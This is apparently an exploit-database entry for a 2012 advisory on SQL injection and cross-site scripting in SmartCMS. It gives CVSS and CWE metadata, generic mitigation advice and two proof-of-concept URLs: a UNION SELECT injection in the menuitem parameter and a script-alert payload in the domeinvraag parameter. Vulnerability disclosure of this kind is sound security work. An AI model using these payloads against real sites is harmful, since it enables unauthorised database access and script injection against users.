header-logo
Suggest Exploit
vendor:
SmartCMS
by:
Yakir Wizman AKA Pr0T3cT10n
8,8
CVSS
HIGH
SQL Injection & Cross Site Scripting
89, 79
CWE
Product Name: SmartCMS
Affected Version From: ALL
Affected Version To: ALL
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

SmartCMS SQL Injection & Cross Site Scripting Vulnerabilities

SmartCMS is vulnerable to SQL Injection and Cross Site Scripting. An attacker can exploit these vulnerabilities by sending a malicious SQL query or a malicious script to the vulnerable parameter. This can allow the attacker to gain access to sensitive information from the database or execute malicious scripts in the victim's browser.

Mitigation:

Input validation should be used to prevent SQL Injection and Cross Site Scripting attacks. The application should also be configured to use a secure connection (HTTPS) to prevent man-in-the-middle attacks.
Source

Exploit-DB raw data:

##########################################################################
## SmartCMS SQL Injection & Cross Site Scripting Vulnerabilities
## Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>
## Date: 29/11/2012
## Version: ALL
## Vendor Link: http://smartcms.nl/
## ISRAEL
##########################################################################
##          Author will be not responsible for any damage.
##########################################################################
## SQL Injection PoC:
## http://www.example.com/index.php?menuitem=29+AND+1=2+UNION+ALL+SELECT+version()--
## Cross Site Scripting PoC:
## http://www.example.comindex.php?menuitem=26&domeinvraag=<script>alert(1);</script>&aktie=Zoek&idx=23
##########################################################################
# 0x31337.net
##########################################################################